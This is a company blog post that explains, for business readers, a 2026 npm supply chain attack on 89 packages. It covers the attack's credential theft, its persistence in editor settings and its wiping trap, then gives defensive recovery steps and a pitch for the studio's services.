TechOrigins
Back to blog
AI Development

89 Code Packages Got Hacked. Here Is What It Means for Your Business.

Hackers hid bad code in 89 npm packages downloaded 700,000+ times a month. Deleting the package does not remove it. What the npm supply chain attack means for your business in plain words.

T
Tech
TechOrigins
June 15, 20266 min read
89 Code Packages Got Hacked. Here Is What It Means for Your Business.

89 Code Packages Got Hacked. Here Is What It Means for Your Business.

Supply chain attack diagram
Supply chain attack diagram

TL;DR

  • Hackers hid bad code in 89 free code packages. People download them more than 700,000 times a month.
  • The bad code hides in your editor. You can delete the package, but the code still runs.
  • It steals your keys and passwords - cloud logins, GitHub tokens, SSH keys, all of it.
  • It all started with one stolen password from one worker.
  • A careful, senior team is your best defense. That is what we do at TechOrigins.

Most apps today are built from parts. Your team does not write every line of code. They pull in free packages made by other people. This saves time. Most days, it works great. But last week, it went wrong again.

Let me walk you through it in plain words.

What happened

Hackers got into 89 code packages. They hid bad code inside them. When your team installs a package, the bad code runs on their computer.

This is called a supply chain attack. It means the threat comes from a part you trust. It does not come from your own code. That is what makes it so hard to catch.

The bad code came in two waves. The first wave hit 32 packages. The second wave hit 57 more. Some bad versions are still live right now.

Why deleting the package does not fix it

Here is the scary part. The bad code does not stay in the package.

When it runs, it copies itself into your editor's settings. It adds a small hook that starts up on its own. So every time your coder opens their editor, the bad code runs again.

This means your team can delete the package. They can wipe the folder. They can install a fresh, clean copy. And the bad code still runs. Removing the package removes nothing. You have to clean the editor too.

It steals your keys and passwords

Cybersecurity breach
Cybersecurity breach

While the bad code runs, it grabs your secrets. It takes your cloud logins. It takes your GitHub tokens. It takes your SSH keys. It grabs all of them and sends them out.

It is also smart. It checks if you run security tools first. If you do, it stays quiet. That way it can hide on watched machines.

It even sets a trap. It pings a server every minute. If you try to cancel a stolen key too fast, the trap goes off. It then wipes your whole home folder. Your files are gone for good. The normal advice - "change all your keys right now" - is the exact thing that sets off the trap. The hackers built it that way on purpose.

How one stolen password started it all

stolen GitHub password → repo access → malicious code pushed → build system packages it → bad packages shipped
stolen GitHub password → repo access → malicious code pushed → build system packages it → bad packages shipped

The whole mess began with one login.

The hackers had one worker's GitHub password. They likely stole it weeks before with other malware. That malware grabs saved passwords from web browsers.

With that one login, they pushed bad code straight into three of the company's code stores. No one reviewed it. Then the company's own build system ran and shipped the bad packages out.

Because the company's system built them, the packages looked safe. They were signed. Every safety check passed. Why? Because the code really did come from the company. The trust was real. That is what makes this attack so clever and so scary.

Why this is a business problem, not just a tech one

It is easy to think this is only a coder's problem. It is not. It hits the whole business.

Think about the money. Stolen cloud keys can run up huge bills. They can also let hackers steal your data and your customers' data.

Think about trust. If your app leaks user data, people leave. Trust is hard to win and easy to lose.

Think about the law. Many rules now say you must guard user data. A leak can mean big fines.

And the scale here is huge. The group behind this is called TeamPCP. They have hit 487 companies. They have stolen almost 300,000 secrets. They now work with a ransomware gang. So your stolen keys may become a way in for an even bigger attack. They have hit big names too - GitHub, Mistral AI, OpenAI, and the European Commission. They even shared their tool with the world and offered a cash prize for the best new uses. So this will not stop soon. Copycats are already at work.

What a careful team does about it

This is where the team you hire really matters. Good habits stop most of these attacks before they start. Here is what we do at TechOrigins.

We lock down every login with extra steps, so one stolen password is not enough. We check new packages before we use them, we do not just trust a name. We watch what code does, not just what it claims to be, because new threats get caught by their actions. We keep your keys out of the code. And we change them in a safe order, so no trap goes off. We build with you and stay for support. We do not vanish at launch.

We have shipped 75+ products in 10 years. Senior team only. No juniors. No handoffs. The people who plan your project are the people who build it. That is how you keep your software safe.

What to do if you think you were hit

Order matters here. Do not change your keys first. That can set off the trap. Do this instead.

  1. Cut the machine off the internet.
  2. Remove the bad start-up hooks from your editor settings.
  3. Only then change your keys and passwords.
  4. Check your build system for any strange new machines linked to it.

If this feels like a lot, you do not have to do it alone. A senior team can help you check your apps and lock them down.

Worried about your own apps? Let's talk. We will give your software an honest look and tell you straight where the risks are.

Book a 30-min call · See the work

Quick answers

What is a software supply chain attack?

It is when hackers hide bad code inside a trusted part your app depends on, like a free code package. The threat comes from a part you trust, not from your own code. The recent npm attack hid malware in 89 packages downloaded over 700,000 times a month.

Why does deleting the package not remove the malware?

Because the bad code copies itself into your editor's settings and adds a startup hook. It runs every time you open the editor. So deleting the package and reinstalling a clean copy is not enough. You must clean the editor settings too.

What should I do first if I think I was hit?

Do not change your keys first, that can trigger a trap. First, take the machine off the internet. Second, remove the bad hooks from your editor settings. Third, change your keys. Fourth, check your build system for strange new machines.

How can my business stay safe?

Use extra login steps, check new packages before using them, use tools that watch what code does, keep keys out of your code, and rotate keys in a safe order. A senior team that builds with care is your best defense.

Sources: Microsoft Threat Intelligence; StepSecurity; Snyk; Tenable; GitGuardian State of Secrets Sprawl 2026; Krebs on Security.

TAGS
npmnpm packagesnpm package compromised
T

Tech

TechOrigins

The TechOrigins team — a senior-only studio that has shipped 75+ AI apps, SaaS products, and high-conversion Shopify stores.

[email protected]
HAVE A PROJECT IN MIND?

Tell us what you're building. 30 minutes.

Or email [email protected]
RELATED READING

More from the journal

View all posts
SaaS Scaling · 8 min read

Engineering Capacity Crunch? When Series A SaaS Teams Should Choose Staff Augmentation vs Outsourcing

Read article
AI Development · 8 min read

Most AI startup ideas die in the prototype phase, here's how to ship yours to production

Read article
AI Engineering · 8 min read

When Does Your Company Need a Forward Deployed Engineer?

Read article
BOOK A CALL

Ready to ship something great? 30 minutes.

No pitch deck. No pressure. We listen, ask the questions that matter, and tell you straight whether we're the right team.

Or email [email protected]